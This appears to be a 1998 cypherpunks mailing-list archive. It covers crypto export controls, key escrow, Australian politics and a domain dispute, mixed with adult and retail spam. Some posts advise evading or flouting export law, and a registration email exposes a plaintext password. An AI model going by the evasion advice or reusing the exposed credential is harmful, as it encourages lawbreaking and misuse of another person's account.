yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
30 RealVid ---> http://www.sexhost.net/rabbit/video-111.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Trina: She bills  herself  as  "America's Favorite Flasher",
very bold words which  she  backs  up  with  a bevy of nasty
pictures. She originally wanted to  keep her identity secret
so she used to wear a mask, but  now we can all find out who
the real beauty  is  behind  the  mask.  Visit  her site and
decide for yourself if the title fits!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Amateur Women Stories:  AmateurWomen.com  brings you totally
hot true sex stories and  real  pics  of hot amatuer models.
See and read what these hot honeys do in private! ..........
............................... http://www.amateurwomen.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?130
Pic  2 --------------------------> http://137.39.63.229/?131
Pic  3 --------------------------> http://137.39.63.229/?132
Pic  4 --------------------------> http://137.39.63.229/?133
Pic  5 --------------------------> http://137.39.63.229/?134
Pic  6 --------------------------> http://137.39.63.229/?135
Pic  7 --------------------------> http://137.39.63.229/?136
Pic  8 --------------------------> http://137.39.63.229/?137
Pic  9 --------------------------> http://137.39.63.229/?138
Pic 10 --------------------------> http://137.39.63.229/?139

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Fri, 13 Feb 1998 10:08:48 -0800 (PST)
To: jmorris@intercode.com.au
Subject: Re: Trust
Message-ID: <199802131757.JAA09223@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


James,

That one is easy.  NSA does not get all the recovery key info from stuff
developed in Australia.

On Fri, 13 Feb 1998 James Morris <jmorris@intercode.com.au> wrote:
> 
> I'm just wondering if anyone else finds it particularly odd that while
> Australia is prepared to commit SAS troops, medical and intelligence
> personnel to a possible strike against Iraq, the US government still
> doesn't seem to trust us enough to use US developed cryptography
> products with adequate security.
> 
> - James.
> 
Bob De Witt,
rdew@el.nec.com

Opinions expressed are my own, and in no way relate to those of my employer,
or anyone else. -rdew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 13 Feb 1998 10:08:57 -0800 (PST)
To: Tim May <cypherpunks@toad.com
Subject: Re: Sabotaging Australian Involvement in Bill's War
In-Reply-To: <34E39B7C.ABBE7A6@intercode.com.au>
Message-ID: <3.0.5.32.19980213100958.007ce970@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:45 PM 2/12/98 -0800, Tim May wrote:
>At 5:01 PM -0800 2/12/98, James Morris wrote:
>>I'm just wondering if anyone else finds it particularly odd that while
>>Australia is prepared to commit SAS troops, medical and intelligence
>>personnel to a possible strike against Iraq, the US government still
>>doesn't seem to trust us enough to use US developed cryptography
>>products with adequate security.
>
>It's not at all odd.
>
>In the New World Order, you Aussies are children. 

Well, We don't let Aussies have guns, why should we trust them with our
cryptographic munitions?

Look, if you have a problem with US domination, just fax your complaints to 
your local Aussie officials.  Our Echelon people will forward 
it to us, no problem.












------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Has Nike hired Monica to endorse kneepads yet?





	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Morris <jmorris@intercode.com.au>
Date: Thu, 12 Feb 1998 17:04:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Trust
Message-ID: <34E39B7C.ABBE7A6@intercode.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I'm just wondering if anyone else finds it particularly odd that while
Australia is prepared to commit SAS troops, medical and intelligence
personnel to a possible strike against Iraq, the US government still
doesn't seem to trust us enough to use US developed cryptography
products with adequate security.

- James.
--
James Morris
<jmorris@intercode.com.au>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 13 Feb 1998 13:22:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: ruling on deceitful domain names
Message-ID: <3.0.5.32.19980213132337.0079cb60@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Seems a wee bit o' infowar is breaking out in the DNS...  

........................................

http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=n/reuters
/980213/wired/stories/domain_1.html

Friday February 13 2:17 PM EST 


 Planned Parenthood wins ruling in domain dispute

 By Jen Sullivan 

 SAN FRANCISCO (Wired) - In a decision that underscores the thorny and
ongoing issue of brand identity and domain names, the
 U.S. Second Court of Appeals upheld a preliminary injunction issued last
March that prevented the use of the plannedparenthood.com
 domain name for a personal anti-abortion Web site. 

 U.S. District Court Judge Kimba Wood ruled that there was "significant
likelihood" that the Web site by Richard Bucci of Syracuse,
 New York, would cause confusion among individuals seeking Planned
Parenthood's actual site, plannedparenthood.org. 

 The .com version has been placed "on hold" by Network Solutions Inc. (NSI)
and is not accessible to Web browsers. 

 Planned Parenthood general counsel Eve Paul lauded the decision. 

 "We aren't a big company that owns factories, we just have our name, and
women all over the country trust our name," Paul said. "We
 can't afford to let someone use it for their own political purposes." 

 Paul praised the court's finding that Bucci's use of the domain was
misleading. "When you went to that Web site, it said 'Welcome to
 the Planned Parenthood home page,"' said Paul. "It really had a very
negative effect on our ability to reach a great audience out there."

 In addition to espousing anti-abortion views, Bucci's site promoted his
friend's anti-abortion book. 

 Bucci, an anti-abortion activist who also hosts a local radio program
several times a week called "Catholic Hour," stopped using the
 disputed domain name after the judge issued her preliminary injunction,
but plans to fight the court's decision, taking appeals all the way
 to Supreme Court if possible. 

 "Do you remember General Patton? We're going to continue to hold Planned
Parenthood by the nose and kick them in the derriere,"
 Bucci said. 

 Though pleased with the end result, Paul expressed dismay over the slow
speed of the process, first with NSI, and then with the
 ensuing legal action. 

 "Network Solutions was very slow," said Paul. "If they had been available,
it certainly would have been cheaper. 

 "Our trademark lawyer wrote them a letter, and they sent back a very
bureaucratic response, saying that we hadn't crossed our T's
 and dotted our I's. We went to court but that turned out to be a longer
process than we had hoped," she said. 

 Network Solutions' stated policy is that they do not arbitrate in
trademark infringement cases. 

 "What insanity has gotten into the minds of the people when they think of
domain names and the Internet," said David Graves, director
 of business affairs at NSI. "What mechanism does the Newspaper Association
of America have in place when an advertiser infringes
 on a trademark in an advertisement? They don't have separate mechanisms." 

 Stanton McCandlish, program director of the Electronic Frontier Federation
(EFF), agreed that trademark infringement is purely a legal
 issue. 

 "NSI has not been doing a very good job," McCandlish said. "They lose
registrations, things get screwed up. But trademark is a big
 open issue. I don't think that anyone can expect NSI to solve that one.
Lawsuits are inevitable. There is not any way to get to heart of
 the matter." 

 Paul said Planned Parenthood was in the process of acquiring the
"plannedparenthood.com" domain name. 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Has Nike hired Monica to endorse kneepads yet?





	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 13 Feb 1998 10:19:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Letter of the law
Message-ID: <fa220db83a0df3a45d5af0ba8b2b136c@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


>I'm in El Paso Texas... so close to the border
>I can see Old Mex outside my window as I write this..
>I'm over there nearly every day for lunch ( I actually
>walk there from my house it's so close) If I write
>a crypto program on my laptop over there and ftp
>it to a web page I have on a server outside the US
>will I have avoided the foolish export regs??
>Does anyone know of someone trying this before?? 

My guess is this:
  if it has the name of a US citizen in the copyright
notice, it will be assumed to have been made in the
US. if the morons even go after you. you still may have
a plausable excuse if ever taken to court.
after all, you "exported" youself, which is a perfectly
legal thing to take out of the country, and "yourself"
accidentally spewed a copy of something that couldn't
cross the border.
I don't think anybody has tried this and been challenged.
then again, a lot of us don't have the opportunity.
It's easier to ask forgivness than permission...
Another easier excuse would be to publish it freely in
hardcopy form, and just "happen" to have somebody end up
"typing" in your source code abroad, making a legit
international copy...
-Anon2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Formosa <dformosa@st.nepean.uws.edu.au>
Date: Thu, 12 Feb 1998 20:48:36 -0800 (PST)
To: James Morris <jmorris@intercode.com.au>
Subject: Re: Trust
In-Reply-To: <34E39B7C.ABBE7A6@intercode.com.au>
Message-ID: <Pine.LNX.3.93.980213140211.2914G-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 13 Feb 1998, James Morris wrote:

> I'm just wondering if anyone else finds it particularly odd that while
> Australia is prepared to commit SAS troops, medical and intelligence
> personnel to a possible strike against Iraq

Nope you haven't relised that the austrailian goverment is the well
trained lap dog of amirica.  Always ready to roll over and get screwed by
the USA.

> , the US government still
> doesn't seem to trust us enough to use US developed cryptography
> products with adequate security.

Of cause not, who would turst a subordermate with such things.  Of cause
we have devoloped softwhere (like SSLeay) that works just as well as any
from the US.  But we can't export something to au because the US is so
much more advansted then us, so we can't be trusted with such products.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNOO60KQK0ynCmdStAQGDowQA061yXNcatlVY+541pJltHUBMJ/2ebrZi
M76FSTGLVL/CsNw5xWKWPlmSKYHwp997NLaG+9nrE8QwFF25CiF6QQEjnxNo8E0W
sAv0lCRnXgmnIKaQjn1T8D3mrUXTQA7kCBmVvGuyLKsu7D9RuG5a+lvup/XRijQI
dHcRnNMt6bk=
=UKQp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "http://musicblvd.com/" <manager@musicblvd.com>
Date: Fri, 13 Feb 1998 17:09:12 -0800 (PST)
To: musicblvd@sparklist.com
Subject: The New Music Boulevard
Message-ID: <3.0.32.19980213144310.007a0a90@mail.sparknet.net>
MIME-Version: 1.0
Content-Type: text/plain



Visit the new and improved Music Boulevard today and check out our new
design!  We've added 5 new music departments -- that means more featured
CDs, new releases, record reviews and in-store specials for you.  Here are
some of the exciting sales events going on right now:  

* FREE SHIPPING for U.S. orders of three or more items!

* 3 CDs for $30! Over 25,000 CDs on sale! 

* Celebrate BLACK HISTORY MONTH with us! Influential artists and essential
albums are on sale.

* Say it with music -- we've got 50 ways to please your lover this
Valentine's Day!

* The GRAMMY NOMINEES are in, and on sale! Winners to be announced on
February 25th.

* The BOGMEN LIVE CD is available exclusively on Music Boulevard, only
while supplies last.  Catch these rising stars while you still can!

To take advantage of these specials and shop from our catalog of over
200,000 albums, stop by Music Boulevard today -- http://www.musicblvd.com !

P.S.  Enjoy Music Boulevard's new look.  We love to hear from our
customers, so please let us know what you think.

THANK YOU FOR SHOPPING ON MUSIC BOULEVARD!

--------------------------------
TO UNSUBSCRIBE
--------------------------------
To unsubscribe from this mailing list, send an email to:
remove-musicblvd@sparklist.com
and you will automatically be removed from this list.

	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Thu, 12 Feb 1998 22:21:09 -0800 (PST)
To: Tim May <tcmay@got.net>
Subject: Re: Sabotaging Australian Involvement in Bill's War
In-Reply-To: <v03102803b10962ad43f3@[207.167.93.63]>
Message-ID: <Pine.LNX.3.93.980213152952.3028C-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 12 Feb 1998, Tim May wrote:

[...]

> (Seriously, what the holy fuck are you Aussies doing getting involved in
> our Moral Leader's vanity war with Saddam?

Our goverment has this quite silly beleafe that if we tag allong with all
your wars, when we get attacked the great Amiracan peaple will come to our
aid out of a sence of appreashation.

The flaw with this is that most amaricans don't know where australia is,
let allown care about it.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNOPQT6QK0ynCmdStAQEOowQAs/Ao0oCGsghLLk0VDKuzTQg5gO2k5KTq
KJPWpA1OAuRlgJQ7f4/Jk27DLCbXbf+semjCpNpUp32nFbQ8/FBSWNH56KY/AU1r
ixL165Da4c8pmAQdjvftU0eZMw5Ob23AMIsX6/v/7bhaWUWmFi225Uc179wY0QmK
0poJWHvaJAw=
=8M++
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 13 Feb 1998 14:01:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Doctor has been spanked!!!
Message-ID: <199802132201.RAA11745@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


As of 1pm today:

#   Guy,
#    
#   Thank you for the supporting documentation you've provided.
#    
#   Dr. Dimitry V's PSINet service has been terminated.

...he called one person too many a 'pedophile'.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Mon, 16 Feb 1998 12:19:49 -0800 (PST)
To: Anonymous <anon@anon.efga.org>
Subject: Re: your mail
In-Reply-To: <4a7a63d6ddc3e466ede1e561740bd106@anon.efga.org>
Message-ID: <Pine.LNX.3.91.980213172851.2690A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I'm in El Paso Texas... so close to the border
> I can see Old Mex outside my window as I write this..
> I'm over there nearly every day for lunch ( I actually
> walk there from my house it's so close) If I write
> a crypto program on my laptop over there and ftp
> it to a web page I have on a server outside the US
> will I have avoided the foolish export regs??
> Does anyone know of someone trying this before?? 


Well, how do you plan on ftping it, if you use a PCMCIA modem car and a  
cellular phone and the cell it transmits to is in the US it could be 
argued that you exported crypto because the data went 
mexico->USA->elsewhere, however, using a normal land-line would be 
totally legal, having said that the program would have to be written 
outside the US, not just carried out on a laptop then ftp`d as otherwise 
you`ve exported. Overall I would recomment flouting the export laws, as 
jumping through hoops to obey these regulations merely panders to the 
wishes of the authorities, anyway, how likely do you think you are to get 
caught? 

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@UnixSysAdmin.com
Date: Fri, 13 Feb 1998 19:10:11 -0800 (PST)
Subject: UnixSysAdmin.com Registration
Message-ID: <199802140308.TAA22118@hawaii.>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for registering with UnixSysAdmin.com

Your Login Name is: cypherpunks
(Login names are CASE SENSITIVE.)
Your Password is: tt22117 

You can now follow this link back to TechTalk: 
http://www.UnixSysAdmin.com/enter.htm 

WARNING: If your username contains spaces or special characters, your login will *not* work!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Feb 1998 16:41:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: BXA, UK Ban, McCain-Kerrey
Message-ID: <1.5.4.32.19980214004354.009d3ccc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to Greg Broiles' and Ulf  Mller's posts and the 
prospect of a UK ban on non-escrowed encryption next Tuesday:


                       Opening Address
             Under Secretary William A. Reinsch   
               Bureau of Export Administration   
                 U.S. Department of Commerce
                       Update West 98   
                  Los Angeles, California    
                      February 10, 1998

[Excerpt]

Encryption

One of the reasons why our licensing load is inching back up 
is the transfer of encryption licensing to Commerce earlier 
this year. No speech from me would be complete without a 
paragraph on encryption, so here it is. 

Our policy is intended to balance the competing interests of 
privacy, electronic commerce, law enforcement, and national 
security. We believe that use of key recovery technologies is 
the best way to achieve that balance. We do not focus narrowly 
on a single technology or approach. We expect the market to 
make those judgments, but we are taking steps to facilitate the 
development and dissemination of these products.

Our regulations allow recoverable encryption products of any 
strength and key length to be exported freely after a single 
review by the government. To encourage movement toward recoverable 
products, we have also created a special, two-year liberalization 
period during which companies may export 56 bit DES or equivalent 
products provided they submit plans to develop key recovery 
products. This provides an incentive for manufacturers to develop 
these products, which in turn will facilitate the development of 
key management infrastructures. So far, we have approved 47 plans, 
from companies large and small, and have five more pending.

In terms of licenses, in calendar year 1997, we received 2076 
applications, and approved 1801 licenses with a dollar value of 
$4.7 billion. (The reason for the high dollar value is because we 
approve encryption licensing arrangements for extended periods of 
time, from 4 to 10 years.)

The interagency working group on cryptography policy, which 
includes representatives from BXA, NSA, and the FBI, continue to 
meet to discuss ways to streamline the licensing process on 
encryption export licenses. Several items have been identified and 
progress is being made in these areas. We have established a 
pre-Operating Committee group to discuss contentious cases. In 
part as a result, no encryption cases have been escalated to the 
OC since mid-December. We have created an Autolist to eliminate 
agency referrals. So far, we have agreed to list specific products 
amounting to 20% of the products we see. This means, once 
implemented, that a subset of licenses can be processed by 
Commerce without prior referral to other agencies. Finally, we 
have posted on our web page "helpful hints" to make the 
encryption licensing process more transparent: 

  http://www.bxa.doc.gov/encguide.htm

We continue to work on other initiatives to streamline the process.

We are also discussing with our trading partners a common approach 
to encryption policy. We have found that most major producing 
countries have public safety and national security concerns similar 
to ours. We are working together with these governments to ensure 
that our policies are compatible, and that they facilitate the 
emergence of a key management infrastructure.

With respect to legislation, we believe the McCain-Kerrey Bill, 
S. 909, the Secure Public Networks Act, provides a sound basis for 
legislation acceptable to both Congress and the Administration. In 
particular, we appreciate the bill's explicit recognition of the 
need to balance competing objectives and of the potential for key 
recovery to become a market-driven mechanism to facilitate 
maintaining that balance. 

...

[Other excerpts of speeches by BXA officials at the seminar:]

Encryption Controls

Export Enforcement has new responsibilities in the encryption area. 
Over the past year, Export Enforcement has opened many new 
investigations involving alleged violations of the encryption 
regulations. These cases are being watched very closely. The 
national security of the United States depends in part on the 
government's ability to obtain timely information about the 
activities and plans of potentially hostile foreign parties, 
such as terrorists and drug dealers. 

... the Department of Justice and National Security Agency 
participate in processing licenses for encryption. ... The 
increase in licenses we are experiencing is attributable not only 
to increased exports, but to transfer of items from the Munitions 
List to Commerce jurisdiction. Encryption licenses account for a 
significant portion of the increase. We created a special division 
to handle those. As of today, there is only one encryption case 
that has been pending over 40 days.

-----

For full speeches: http://jya.com/bxa-west98.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Q" <yafq@telcel.net.ve>
Date: Fri, 13 Feb 1998 19:46:29 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Q
Message-ID: <19980214034036.AAA6656@telcel.telcel.net.ve>
MIME-Version: 1.0
Content-Type: text/plain


Whats up?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Q" <yafq@telcel.net.ve>
Date: Fri, 13 Feb 1998 19:46:26 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Q
Message-ID: <19980214034036.AAB6656@telcel.telcel.net.ve>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3989.1071713779.multipart/mixed"

--Boundary..3989.1071713779.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hi to all the teens out there

--Boundary..3989.1071713779.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "Q1.txt.pgp (PGP Encrypted File)"

qANQR1DBwk4DAkofdiJa+asQC/0bJjIsgOOWotdJc6zgODRvHGpgDD1v4li3
LQ5Vj+cJFZq+I0XuuoqBPFB3GxFp+jT64rbzas5ZmdlmIxCuBtxxM6bnzlqi
4qLWWjhRatS+ysAa83ZJ9GaJ0EfWaoGrB61gK4S1+aaRcoILvaPDUUEmVwxH
WCh6Jz0N3RMX083KYLokktlYd10/g6r6SGurWdzeNmYIv8ZWbawRySaOvQEc
ntYmmCdrZAxBwmKVsrMmtih15Z43LYRF8jQg/J8ubwGgpglmaDq+IExvMUk8
0sKc2UiEFjJUotrXaIcFyMsrCCknZYCAQnN69AJZCJiUivHscTpcfzqmfzy6
BCqj+mD4EVFUdx1ZKaxcRTCimAowfBTbnZgDunWoeyklp44E0bhLwnr5MhVt
7HFO8XEDMeBKe4prPUFwbLPWV+PAVbLfxH0qjrwoldKF9tBtNwn27yG5/Hl9
Ff9N2O6jkYIN83tLG0EbFlidZforDMDr2Z6VImgeTwfw2QfvtGhP+zWBWxwL
/0zy1qTDe8yrEeMhtzZGjL4GDreBqq5LyAyijs7rREp80lyLbuTB9Taloz8n
ttL0V5plh/VLkQ0CODXf9AYwuSMMyqRpi8sBJ7GO7v7Bi8iXArPWQUn1n0lK
7I1njzIEGqKjV/F6mf3UT/rjzRNAL8oYNFtq5X2hpI+NBE2uxW0B4FuhSoIt
xn5hTzWC2vdHf3RLiQ6tf2vf6j5sT8XixMQcXvxsWDO5Iq6sshWRsFFzyETT
DNQjIk3w5Zxc7PO7ZGyNSzI/YSNlG3xJul5RZPHbrX4Vj2UaGB7gXONG7zmq
FdPCkI2Z7XqEd2+X10bD8M47bNuO+L/04Mx6fn1fLrkA2rmuznawvU0mJLFr
zfq1/GBS2X777SF51IZqMOzeGav6zS0eiVXplqrltDNxb25chZ9uvR8evC4Z
+4/fF95sA1o2WFX++kye4Vc41tCnGQztvnrCDObe3ISY0EctMWnmb4bZMNH4
5opcjrNT1bTN0qbqaGIedR6W2149YxbnGMmgOTjElWammYEWai2iNAt+vb58
z6+9JPuw7IzRxrfh1Vt6hNszaokarPNssGv+IwxEKIcWj3EZDPFcN2q9FQTx
qacT6PSjdnVUia/AlHzlV0AWtKgvIw83VFGKI5QqADPly6MsuZu6oDdATLHP
PY2LgMEFtsU8L2w3dZzjv9wD1hfhZgjPyYhEevsM1Mpcscivwn8ATfMUFLdo
6Xq67UmzPw==
--Boundary..3989.1071713779.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Fri, 13 Feb 1998 15:41:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UK Crypto Ban?
In-Reply-To: <1.5.4.32.19980212001956.00b27e4c@pop.pipeline.com>
Message-ID: <9802132341.AA78212@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


>The Government will propose creating a network of what are called
>Trusted Third Parties, or TTPs.

Britain is now trying to establish the infamous GCHQ protocol as the
ETSI standard for "Trusted Third Parties".  Ulrich Sandl (who
represents the German ministry of economics on crypto issues at
international conferences etc.) wrote on the Krypto mailing list that
the German and other delegations have protested in the last minute.
The German standards proposal does not contain key escrow.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 14 Feb 1998 00:51:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Beating the UK Crypto ban.
Message-ID: <199802140851.AAA01341@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


    --
Supposedly the UK is not going to prohibit cryptography, the
kindly and benevolent government is merely going to protect
us from irresponsible certificate authorities by licensing
the issue of certificates.

Thus in theory the ban should not affect Crypto Kong, which 
does not rely on certificates, does not attempt to address
the question of which Bob is the real Bob.

Instead it merely checks that the Bob who signed one letter 
is the same Bob as the Bob who signed the other letter.

(And you can make an encrypted reply to any signed document)


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     CK7qsZEkDlKWk1tmxpi8TmOY5r7pCmwM+xlgxk5x
     4pFtHUXCAe4Hr1r3Zj40b35HrJbyCKusv0OUOt/Yo
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moneyman@tagentp.com
Date: Sat, 14 Feb 1998 14:20:12 -0800 (PST)
To: moneyman@tagentp.com
Subject: !!!!!! ATTENTION !!!!!
Message-ID: <199802140751.CAA19986@tagentp.com>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sat, 14 Feb 1998 01:19:44 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Microsoft says it's spying on you....
Message-ID: <Pine.SOL.3.96.980214041710.12159A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



"Microsoft says it's spying on you with only the purest of intentions. At
least for now..."

http://www.mojones.com/mother_jones/JF98/blow.html 

TATTOOMAN 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sat, 14 Feb 1998 01:27:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Letter of the law
In-Reply-To: <fa220db83a0df3a45d5af0ba8b2b136c@anon.efga.org>
Message-ID: <Pine.SOL.3.96.980214042034.12159B-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Feb 1998, Anonymous wrote:

>>I'm in El Paso Texas... so close to the border
>>I can see Old Mex outside my window as I write this..
>>I'm over there nearly every day for lunch ( I actually
>>walk there from my house it's so close) If I write
>>a crypto program on my laptop over there and ftp
>>it to a web page I have on a server outside the US
>>will I have avoided the foolish export regs??
>>Does anyone know of someone trying this before?? 
>
>My guess is this:
>  if it has the name of a US citizen in the copyright
>notice, it will be assumed to have been made in the
>US. if the morons even go after you. you still may have
>a plausable excuse if ever taken to court.
>after all, you "exported" youself, which is a perfectly
>legal thing to take out of the country, and "yourself"
>accidentally spewed a copy of something that couldn't
>cross the border.
>I don't think anybody has tried this and been challenged.
>then again, a lot of us don't have the opportunity.
>It's easier to ask forgivness than permission...
>Another easier excuse would be to publish it freely in
>hardcopy form, and just "happen" to have somebody end up
>"typing" in your source code abroad, making a legit
>international copy...
>-Anon2

i would think that the big question here, legally, is whether or not you
would be ustilizing a US ISP and/or cellular provider to make the upload
of the crypto program to the foreign server via ftp.  as long as all the
packets stay outside of US borders, in other words, as long as you don't
use a US ISP and cellular provider, then i don't see how you would be
violating any laws in this case.

Regards,

TATTOOMAN 

http://152.7.11.38/~tattooman/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 14 Feb 1998 03:26:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunk Policeman?
Message-ID: <199802141126.GAA12507@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From attila@hun.org Sat Feb 14 03:53:19 1998
   >   To: Information Security <guy@panix.com>,
   >           cypherpunks <cypherpunks@cyberpass.net>
   >   Cc: listproc <attila@primenet.com>
   >   Subject: Bye, Bye, Guy [was The Doctor has been spanked!!!]
   >   X-Comment: Cyberspace is Our Freedom!  Your CDA is Dead!
   >   
   >   -----BEGIN PGP SIGNED MESSAGE-----
   >   
   >       well, I hope you're real proud of yourself for being the 
   >       new cypherpunk policeman.

It had nothing to do with the cypherpunks per se,
and the majority of the documentation was from Usenet.

   >       ...just like we're all real
   >       proud to know a true snitch who thinks his dirty hands
   >       are bright white and his deeds are pure as the driven 
   >       snow while he censors free speech.

Huh?

I'm just a pissed-off white guy.

